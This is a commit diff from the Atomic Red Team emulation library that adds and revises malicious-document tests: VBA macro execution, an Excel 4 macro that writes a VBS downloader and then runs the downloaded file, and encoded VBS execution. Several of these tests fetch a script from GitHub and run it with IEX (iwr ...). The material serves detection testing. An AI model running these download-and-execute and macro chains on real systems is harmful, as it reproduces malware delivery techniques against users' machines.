update output file name to match expected (#1315)

* update output file name to match expected

* Generate docs from job=validate_atomics_generate_docs branch=clr2of8-patch-1

* Generate docs from job=validate_atomics_generate_docs branch=clr2of8-patch-1

Co-authored-by: CircleCI Atomic Red Team doc generator <email>
Carrie Roberts
2020-12-09 09:26:36 -07:00
committed by GitHub
parent 8e33c2801e
commit 1ca8072bc9
11 changed files with 422 additions and 165 deletions
@@ -633,6 +633,7 @@ execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-8
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -661,6 +662,7 @@ execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a rem
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
633 execution T1204.002 Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
634 execution T1204.002 Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
635 execution T1204.002 Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
636 execution T1204.002 Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
637 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
638 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
639 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
662 execution T1059.004 Unix Shell 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
663 execution T1059.004 Unix Shell 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
664 execution T1059.005 Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
665 execution T1059.005 Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
666 execution T1059.003 Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
667 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
668 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
@@ -439,6 +439,7 @@ execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-8
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -465,6 +466,7 @@ execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
439 execution T1204.002 Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
440 execution T1204.002 Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
441 execution T1204.002 Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
442 execution T1204.002 Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
443 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
444 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
445 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
466 execution T1569.002 Service Execution 1 Execute a Command as a Service 2382dee2-a75f-49aa-9378-f52df6ed3fb1 command_prompt
467 execution T1569.002 Service Execution 2 Use PsExec to execute a command on a remote host 873106b7-cfed-454b-8680-fa9f6400431c command_prompt
468 execution T1059.005 Visual Basic 1 Visual Basic script execution to gather local computer information 1620de42-160a-4fe5-bbaf-d3fef0181ce9 powershell
469 execution T1059.005 Visual Basic 2 Encoded VBS code execution e8209d5f-e42d-45e6-9c2f-633ac4f1eefa powershell
470 execution T1059.003 Windows Command Shell 1 Create and Execute Batch Script 9e8894c0-50bd-4525-a96c-d4ac78ece388 powershell
471 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
472 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
@@ -1090,6 +1090,7 @@
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -1133,6 +1134,7 @@
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
@@ -836,6 +836,7 @@
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -875,6 +876,7 @@
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
@@ -40405,7 +40405,7 @@ discovery:
- linux
- macos
executor:
command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
command: 'username=$(id -u -n) && lsof -u $username
'
name: sh
@@ -44322,35 +44322,30 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
Default latest version.
type: String
default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
-Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
| Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
$ms_office_version = #{ms_office_version}
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
'
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
@@ -44388,34 +44383,27 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
Default latest version.
type: String
default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
-Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
| Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
$ms_office_version = #{ms_office_version}
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: OSTAP JS version
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
@@ -44433,35 +44421,27 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
Default latest version.
type: String
default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
-Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
| Sort-Object -desc)
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
cleanup_command: |
$ms_office_version = #{ms_office_version}
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: Office launching .bat file from AppData
auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
@@ -44473,41 +44453,126 @@ execution:
bat_path:
description: Path to malicious .bat file
type: String
default: $env:temp+"\art1204.bat"
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
Default latest version.
type: string
default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
-Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
| Sort-Object -desc)[0]
default: $("$env:temp\art1204.bat")
ms_product:
description: Maldoc application Word or Excel
type: String
default: Word
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependant registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
$ms_office_version = #{ms_office_version}
If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$ms_office_version = #{ms_office_version}
$bat_path = #{bat_path}
$macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
name: powershell
- name: Excel 4 Macro
auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
description: |
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
with Excel matches that of the local system. This username can be found under Files -> Options -> Username
supported_platforms:
- windows
input_arguments:
download_url:
description: Download URL
type: String
default: https://live.sysinternals.com/procexp.exe
uname:
description: Username for pathing
type: String
default: "$env:Username"
dependency_executor_name: powershell
dependencies:
- description: 'Microsoft Excel must be installed
'
prereq_command: |
try {
New-Object -COMObject "Excel.Application" | Out-Null
Stop-Process -Name "Excel"
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
manually to meet this requirement"
'
executor:
command: |
$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
$fname1 = "$env:TEMP\procexp.exe"
if (Test-Path $fname) {
Remove-Item $fname
Remove-Item $fname1
}
$xlApp = New-Object -COMObject "Excel.Application"
$xlApp.Visible = $True
$xlApp.DisplayAlerts = $False
$xlBook = $xlApp.Workbooks.Add()
$sheet = $xlBook.Excel4MacroSheets.Add()
if ("#{uname}" -ne "") {
$sheet.Cells.Item(1,1) = "#{uname}"
} else {
$sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
}
$sheet.Cells.Item(2,1) = "procexp.exe"
$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
$sheet.Cells.Item(23,1) = "=HALT()"
$sheet.Cells.Item(1,1).Name = "runme"
$xlApp.Run("runme")
$xlApp.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
[System.GC]::Collect()
[System.GC]::WaitForPendingFinalizers()
Remove-Variable xlBook
Remove-Variable xlApp
cleanup_command: |
$ms_office_version = #{ms_office_version}
if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Stop-Process -Name "procexp*" -ErrorAction Ignore
Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
name: powershell
T1204.001:
technique:
@@ -46107,11 +46172,46 @@ execution:
New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
executor:
command: 'cscript #{vbscript} > $env:TEMP\out.txt'
command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
cleanup_command: |-
Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
name: powershell
- name: Encoded VBS code execution
auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
description: |
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'The 64-bit version of Microsoft Office must be installed
'
prereq_command: |
try {
$wdApp = New-Object -COMObject "Word.Application"
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
manually to meet this requirement"
'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
-like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
'
name: powershell
T1059.003:
technique:
created: '2020-03-09T14:12:31.196Z'
@@ -55331,31 +55431,30 @@ initial-access:
description: Maldoc application Word or Excel
type: String
default: Word
ms_office_version:
description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
type: String
default: '16.0'
dependency_executor_name: powershell
dependencies:
- description: 'Test Requires MS Office to be installed and have been run previously.
Run -GetPrereqs to run msword and build dependent registry keys
- description: 'Microsoft #{ms_product} must be installed
'
prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
{ exit 0 } else { exit 1 }
prereq_command: |
try {
New-Object -COMObject "#{ms_product}.Application" | Out-Null
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
Stop-Process -Name $process
exit 0
} catch { exit 1 }
get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
manually to meet this requirement"
'
get_prereq_command: |
$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
'
name: powershell
T1566.002:
technique:
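Review bot: The new `prereq_command` blocks for the Maldoc tests (and the 64-bit check in the Encoded VBS test) end with `Stop-Process -Name $process` / `Stop-Process -Name "winword"`, which terminates every running Word or Excel process on the host rather than the instance the check itself created, so an operator with an unsaved document open loses it when merely checking prerequisites. Closing only the COM instance avoids that and needs no process lookup: `$app = New-Object -COMObject "#{ms_product}.Application"; $app.Quit(); [System.Runtime.Interopservices.Marshal]::ReleaseComObject($app) | Out-Null` (the same `ReleaseComObject` idiom the Excel 4 Macro executor already uses). The Encoded VBS cleanup has the same collateral problem in `Where-Object {$_.CommandLine -like "*mshta*"}`, which kills any process whose command line merely contains that substring, not just the one the macro launched. That test also `IEX`es Invoke-MalDoc.ps1 from the unpinned `master` branch, so its behaviour depends on upstream availability and integrity at run time; pinning to a commit SHA or using the copy under `PathToAtomicsFolder` would remove that dependency, though the pattern predates this commit. Since this index appears to be generated by the CI job, the fixes belong in the source atomic YAML files it is built from.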
@@ -10,6 +10,8 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
- [Atomic Test #1 - Visual Basic script execution to gather local computer information](#atomic-test-1---visual-basic-script-execution-to-gather-local-computer-information)
- [Atomic Test #2 - Encoded VBS code execution](#atomic-test-2---encoded-vbs-code-execution)
<br/>
@@ -33,7 +35,7 @@ When successful, system information will be written to $env:TEMP\T1059.005.out.t
```powershell
cscript #{vbscript} > $env:TEMP\out.txt
cscript #{vbscript} > $env:TEMP\T1059.005.out.txt
```
#### Cleanup Commands:
@@ -60,4 +62,54 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
<br/>
<br/>
## Atomic Test #2 - Encoded VBS code execution
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
You can validate this by opening WinWord -> File -> Account -> About Word
**Supported Platforms:** Windows
#### Attack Commands: Run with `powershell`!
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
```
#### Cleanup Commands:
```powershell
Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
```
#### Dependencies: Run with `powershell`!
##### Description: The 64-bit version of Microsoft Office must be installed
##### Check Prereq Commands:
```powershell
try {
$wdApp = New-Object -COMObject "Word.Application"
$path = $wdApp.Path
Stop-Process -Name "winword"
if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
```
<br/>
@@ -23,13 +23,13 @@ atomic_tests:
New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
executor:
command: 'cscript #{vbscript} > $env:TEMP\out.txt'
command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
cleanup_command: |-
Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
name: powershell
- name: Encoded VBS code execution
auto_generated_guid:
auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
description: |
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
